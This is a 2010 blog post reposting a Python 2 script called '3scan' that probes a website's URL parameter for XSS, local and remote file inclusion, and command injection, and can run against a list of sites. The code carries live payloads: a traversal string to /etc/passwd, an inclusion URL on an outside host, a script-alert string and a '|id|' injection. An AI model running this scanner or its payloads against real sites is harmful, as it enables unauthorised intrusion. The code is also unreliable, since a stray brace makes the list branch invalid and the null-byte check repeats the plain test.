Thursday, November 25, 2010

3scan ( lfi-xss-rfi-cmd) 

[code]

#!/usr/bin/python

#Checks LFI,XSS,RFI,CMD injection searches source and http response (simple)


#http://www.darkc0de.com

#d3hydr8[at]gmail[dot]com


import sys, httplib, urllib2, re


#Don't change LFI,XSS, or CMD

LFI = "../../../../../../../../../../../../etc/passwd"

RFI = "http://yozurino.com/r.txt?"

RFI_TITLE = "Target"

XSS = "%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"

CMD = "|id|"


def main(host):

   host = host.replace("http://","")

   if host[-1:] != "=":

      print "\n[-] Host should end with a \'=\'\n"

      print "[-]",host

      sys.exit(1)


   print "\n[+] Host:",host


   try:

      print "\n[+] Checking XSS"

      xss(host)

      print "\n[+] Checking LFI"

      lfi(host)

      print "\n[+] Checking RFI"

      rfi(host)

      print "\n[+] Checking CMD"

      cmd(host)

   except(urllib2.HTTPError, urllib2.URLError), msg:

      print "[-] Error Occurred:",msg

      pass



def rfi(host):


   try:

      h = httplib.HTTP(host.rsplit("/")[0])

      h.putrequest("GET","/"+host.rsplit("/")[1]+RFI)

      h.putheader("Host", host.rsplit("/")[0])

      h.endheaders()

      status, reason, headers = h.getreply()

      source = urllib2.urlopen("http://"+host+RFI).read()

      if re.search("Target", source) and status == 200:

         print "[+] RFI:",host+RFI,"\n[+]",status, reason

      else:

         print "[-] Not Vuln."

   except(),msg:

      #print "[-] Error Occurred",msg

      pass


def xss(host):

   source = urllib2.urlopen("http://"+host+XSS).read()

   if re.search("XSS", source) != None:

      print "[!] XSS:",host+XSS

   else:

      print "[-] Not Vuln."


def cmd(host):

   source = urllib2.urlopen("http://"+host+CMD).read()

   if re.search("uid=", source) != None:

      print "[!] CMD:",host+CMD

   else:

      print "[-] Not Vuln."


def lfi(host):


   source = urllib2.urlopen("http://"+host+LFI).read()

   if re.search("root:", source) != None:

      print "[!] LFI:",host+LFI

   else:

      print "[-] Not Vuln."

   source = urllib2.urlopen("http://"+host+LFI+"").read()

   if re.search("root:", source) != None:

      print "[!] LFI:",host+LFI+""

   else:

      print "[-] Not Vuln. w/  Null Byte"


if len(sys.argv) != 3:

   print "\nUsage: ./3scan.py "

   print "ex: ./3scan.py -s www.example.com/index.php?page="

   print "ex: ./3scan.py -list /home/d3hydr8/sites.txt"

   print "\t[options]"

   print "\t   -s/-site  : Searches just that site"

   print "\t   -l/-list  : Searches list"

   sys.exit(1)


print "\n   d3hydr8[at]gmail[dot]com 3scan v1.0"

print "---------------------------------------"


if sys.argv[1].lower() == "-l" or sys.argv[1].lower() == "-list"{ :

}

   try:

        sites = open(sys.argv[2], "r").readlines()

   except(IOError):

        print "Error: Check your file path\n"

        sys.exit(1)

   for host in sites:

      main(host.replace("\n",""))

else:

   main(sys.argv[2])


print "\n[+] Done\n"

[/code]
Posted by at
Labels: , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)